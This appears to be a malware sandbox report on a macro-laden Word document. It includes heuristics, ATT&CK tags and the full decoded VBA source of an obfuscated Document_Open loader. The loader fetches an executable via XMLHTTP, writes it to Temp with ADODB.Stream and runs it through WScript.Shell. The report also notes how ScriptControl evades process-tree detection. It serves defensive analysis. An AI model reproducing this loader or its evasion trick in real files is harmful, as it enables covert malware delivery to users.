MALICIOUS
130
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1105 Ingress Tool Transfer
The sample contains an obfuscated VBA macro with a Document_Open auto-execution function. The macro builds its download URL from a Chr() character array; decoding the sequence gives 'https://the.earth.li/~sgtatham/putty/0.70/w32/putty.exe' (this is the public PuTTY download location, so the fetched binary itself may well be benign and the verdict rests on the loader technique rather than on the payload). The drop path 'C:\Users\<username>\AppData\Local\Temp\wtphjgf.exe' is built from Environ("Username"), and every other string is assembled with a "[D]" junk-token Replace() decoder. The macro then instantiates an MSScriptControl.ScriptControl, sets its language to VBScript, and runs a decoded subroutine ('Cactus') that fetches the file with Microsoft.XMLHTTP, writes the response body to disk with ADODB.Stream (binary mode, overwrite), and launches the dropped file through WScript.Shell.Run. Because the script is executed by ScriptControl inside the Office process rather than by a wscript.exe/cscript.exe child, process-tree detections keyed on a script-host child will not see the download step; the child process that does appear is the dropped executable itself.
Heuristics 5
-
VBA project inside OOXML medium 3 related findings OOXML_VBA — Document contains a VBA project (VBA macros present)
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADER — Auto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source. In this sample two decoder styles are combined: a Chr() numeric char-array for the download URL and a "[D]" junk-token Replace() for every other string, with ScriptControl.AddCode/.Run as the execution sink.
-
Document_Open macro high OLE_VBA_DOCOPEN — Document_Open macro (runs automatically when the document is opened with macros enabled)
-
Environ() call (env variable access) low OLE_VBA_ENVIRON — Environ() call (env variable access); here Environ("Username") is used to build a per-user drop path under C:\Users\<username>\AppData\Local\Temp (normally %LOCALAPPDATA%\Temp).
-
Embedded URL info EMBEDDED_URL — One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. All URLs listed below are standard OOXML/WordprocessingML schema namespaces that appear in any .docx; the actual download URL is assembled at runtime from Chr() calls in the macro and therefore does not appear in this static list (see the decoded value in the extracted macros.bas). URL http://schemas.openxmlformats.org/markup-compatibility/2006 — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationships — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/math — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing — In document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/main — In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordml — In document text (OOXML body / shared strings)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 3127 bytes |
SHA-256: a60944b4c9a1d308a5a3d0f96e2956e3569062eddd3a96957d4c8425422f214f |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
' Module-level state shared between Document_Open and mukewr.
Public Bruvera As String        ' download URL, assembled from Chr() codes in Document_Open
Public Noimnot As String        ' drop path: C:\Users\<Environ("Username")>\AppData\Local\Temp\wtphjgf.exe
Public Rohliky As ScriptControl ' early-bound ScriptControl that compiles and runs the decoded VBScript
' Deobfuscation helper: returns leika with every "[D]" junk token removed.
' Almost every string literal in this module is written with "[D]" spliced
' between characters so that indicators such as "VBScript", "WScript.Shell"
' and "Microsoft.XMLHTTP" never appear contiguously in the macro source.
Private Function nubemrd(ByVal leika As String)
nubemrd = Replace(leika, "[D]", vbNullString)
End Function
' Auto-execution entry point: Word runs this when the document is opened and
' macros are enabled. Builds the download URL and drop path, then hands the
' decoded VBScript downloader (mukewr) to a ScriptControl instance and runs it.
Private Sub Document_Open()
' Chr() character array. Decoded value:
'   https://the.earth.li/~sgtatham/putty/0.70/w32/putty.exe
Bruvera = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(115) & Chr(58) & Chr(47) & Chr(47) & Chr(116) & Chr(104) & Chr(101) & Chr(46) & Chr(101) & Chr(97) & Chr(114) & Chr(116) & Chr(104) & Chr(46) & Chr(108) & Chr(105) & Chr(47) & Chr(126) & Chr(115) & Chr(103) & Chr(116) & Chr(97) & Chr(116) & Chr(104) & Chr(97) & Chr(109) & Chr(47) & Chr(112) & Chr(117) & Chr(116) & Chr(116) & Chr(121) & Chr(47) & Chr(48) & Chr(46) & Chr(55) & Chr(48) & Chr(47) & Chr(119) & Chr(51) & Chr(50) & Chr(47) & Chr(112) & Chr(117) & Chr(116) & Chr(116) & Chr(121) & Chr(46) & Chr(101) & Chr(120) & Chr(101)
' Decoded: "C:\Users\" & Environ("Username") & "\AppData\Local\Temp\wtphjgf.exe"
Noimnot = nubemrd("C[D]:\U[D]ser[D]s\") & Environ(nubemrd("Us[D]er[D]na[D]me")) & nubemrd("\A[D]pp[D]Da[D]ta\Lo[D]ca[D]l\T[D]em[D]p\wtphjgf.e[D]xe")
' Early-bound New ScriptControl: needs a project reference to MSScriptControl.
' NOTE(review): this component is normally only available to 32-bit Office;
' on 64-bit Office this line is expected to fail before any download happens -
' confirm in a detonation before assuming the chain completes.
Set Rohliky = New ScriptControl
' Decoded: "VBScript"
Rohliky.Language = nubemrd("V[D]BSc[D]ri[D]pt")
' mukewr() returns the decoded source of "Sub Cactus" (GET URL, save to Noimnot, run it).
Rohliky.AddCode mukewr()
' Decoded: "Cactus". The script runs in-process inside Word via ScriptControl;
' the only child process that appears is the dropped wtphjgf.exe.
Rohliky.Run nubemrd("Ca[D]ct[D]us")
End Sub
' Returns the VBScript source that Document_Open feeds to ScriptControl.AddCode.
' Every fragment is passed through nubemrd() so the script body never appears
' contiguously in the macro. With <Bruvera> and <Noimnot> substituted, the
' returned text decodes to:
'
'   Sub Cactus
'   dim lhrp
'   dim rhlpo: Set rhlpo = createobject("Microsoft.XMLHTTP")
'   dim yxoze: Set yxoze = createobject("Adodb.Stream")
'   rhlpo.Open "GET", "<Bruvera>", False
'   rhlpo.Send
'   With yxoze
'   .type = 1
'   .open
'   .write rhlpo.responseBody
'   .savetofile "<Noimnot>", 2
'   end With
'   CreateObject("WScript.Shell").Run "<Noimnot>"
'   end sub
'
' i.e. a synchronous HTTP GET of the URL in Bruvera, the response body written
' to the path in Noimnot as a binary stream (type = 1) with overwrite (2), then
' the dropped file launched with WScript.Shell.Run. "lhrp" is declared but
' never used.
Private Function mukewr()
' line separator for the generated script
deletrs = vbCrLf
' Sub Cactus
truetoth = nubemrd("[D]Su[D]b Ca[D]ct[D]us") & deletrs
' dim lhrp   (unused)
truetoth = truetoth & nubemrd("[D]di[D]m [D]lh[D]rp") & deletrs
' dim rhlpo: Set rhlpo = createobject("Microsoft.XMLHTTP")
truetoth = truetoth & nubemrd("[D]di[D]m [D]rh[D]lp[D]o:[D] S[D]et[D] r[D]hl[D]po[D] =[D] c[D]re[D]at[D]eo[D]bj[D]ec[D]t(") & Chr(34) & nubemrd("[D]Mi[D]cr[D]os[D]of[D]t.[D]XM[D]LH[D]TT[D]P") & Chr(34) & ")" & deletrs
' dim yxoze: Set yxoze = createobject("Adodb.Stream")
truetoth = truetoth & nubemrd("[D]di[D]m [D]yx[D]oz[D]e:[D] S[D]et[D] y[D]xo[D]ze[D] =[D] c[D]re[D]at[D]eo[D]bj[D]ec[D]t(") & Chr(34) & nubemrd("[D]Ad[D]od[D]b.[D]St[D]re[D]am") & Chr(34) & ")" & deletrs
' rhlpo.Open "GET", "<Bruvera>", False   (synchronous request)
truetoth = truetoth & nubemrd("[D]rh[D]lp[D]o.[D]Op[D]en[D] ") & Chr(34) & nubemrd("[D]GE[D]T") & Chr(34) & ", " & Chr(34) & Bruvera & Chr(34) & nubemrd("[D], [D]Fa[D]ls[D]e") & deletrs
' rhlpo.Send
truetoth = truetoth & nubemrd("[D]rh[D]lp[D]o.[D]Se[D]nd") & deletrs
' With yxoze
truetoth = truetoth & nubemrd("[D]Wi[D]th[D] y[D]xo[D]ze") & deletrs
' .type = 1   (adTypeBinary)
truetoth = truetoth & nubemrd("[D].t[D]yp[D]e [D]= [D]1") & deletrs
' .open
truetoth = truetoth & nubemrd("[D].o[D]pe[D]n") & deletrs
' .write rhlpo.responseBody
truetoth = truetoth & nubemrd("[D].w[D]ri[D]te[D] r[D]hl[D]po[D].r[D]es[D]po[D]ns[D]eB[D]od[D]y") & deletrs
' .savetofile "<Noimnot>", 2   (adSaveCreateOverWrite)
truetoth = truetoth & nubemrd("[D].s[D]av[D]et[D]of[D]il[D]e ") & Chr(34) & Noimnot & Chr(34) & ", 2" & deletrs
' end With
truetoth = truetoth & nubemrd("[D]en[D]d [D]Wi[D]th") & deletrs
' CreateObject("WScript.Shell").Run "<Noimnot>"   (execution sink)
truetoth = truetoth & nubemrd("[D]Cr[D]ea[D]te[D]Ob[D]je[D]ct[D](") & Chr(34) & nubemrd("[D]WS[D]cr[D]ip[D]t.[D]Sh[D]el[D]l") & Chr(34) & nubemrd("[D]).[D]Ru[D]n ") & Chr(34) & Noimnot & Chr(34) & deletrs
' end sub
truetoth = truetoth & nubemrd("[D]en[D]d [D]su[D]b")
mukewr = truetoth
End Function
Attribute VB_Name = "NewMacros"
' Empty macro in the NewMacros module: it has no body and nothing in the
' loader calls it. NOTE(review): looks like a macro-recorder stub left in
' the template - confirm, but it contributes nothing to the behaviour.
Sub blccc()
'
' blccc Macro
'
'
End Sub
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 13824 bytes |
SHA-256: cd7dd464416769ceee89a2ac8251750115aca4abd7f201da2378ea7870ee8162 |
|||